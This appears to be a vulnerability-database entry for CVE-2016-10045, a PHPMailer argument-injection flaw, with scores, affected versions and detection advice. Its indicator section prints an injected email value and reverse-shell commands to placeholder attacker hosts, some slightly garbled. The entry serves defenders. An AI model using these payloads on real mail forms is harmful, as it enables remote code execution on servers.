CVE-2016-10045
published 2016-12-30


Priority: P1 82 · Severity: critical · Base score: 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 98.04% (99.9th percentile)
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.

Affected (6 ranges)

Vendor             Product            Version range          Fixed in
debian             libphp-phpmailer   (not specified)        (not specified)
joomla             joomla_!           1.5.0 – 3.6.5          (not specified)
phpmailer          phpmailer          >= 5.0.0, < 5.2.18     5.2.18
phpmailer          phpmailer          >= 5.0.0, < 5.2.20     5.2.20
phpmailer_project  phpmailer          < 5.2.20               5.2.20
wordpress          wordpress          <= 4.7                 (not specified)

Detection & IOCs (extracted from sources)

command: "a\' -be <cmd> "@a.co
command: /bin/bash -c '0/dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT>;nohup sh &196 2>&196 &'
command: /dev/tcp/<ATTACKERS_IP>/<ATTACKERS_PORT> 0&1'
  • Monitor HTTP POST requests to contact form endpoints where the email field contains `-be` (Exim/sendmail argument injection flag) combined with `/dev/tcp/` reverse shell strings — indicative of active exploitation.
  • The Metasploit module for this CVE writes a payload file to the web root and then triggers it via HTTP request; detect unexpected new PHP files appearing in the web root combined with outbound connections from the web server process.
  • The vulnerability stems from improper interaction between escapeshellarg and PHP's internal mail() escaping; audit PHPMailer versions below 5.2.20 using isMail transport for unpatched deployments.
  • CVE-2016-10045 exists specifically because the patch for CVE-2016-10033 was incomplete; systems patched only to PHPMailer 5.2.18/5.2.19 remain vulnerable — the fix requires 5.2.20 or later.
  • Only the isMail transport (using PHP's built-in mail() function) is affected; SMTP transport is not vulnerable to this argument injection vector.
  • Exploitation requires the web server user running PHPMailer to have write access to the web root directory for the file-drop technique used by the Metasploit module.

CVSS provenance

Source          Version  Score  Severity  Vector
nvd             v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa            -        9.8    CRITICAL  -
osv             -        9.8    CRITICAL  -
vendor_debian   -        9.8    LOW       -
vendor_ubuntu   -        9.8    CRITICAL  -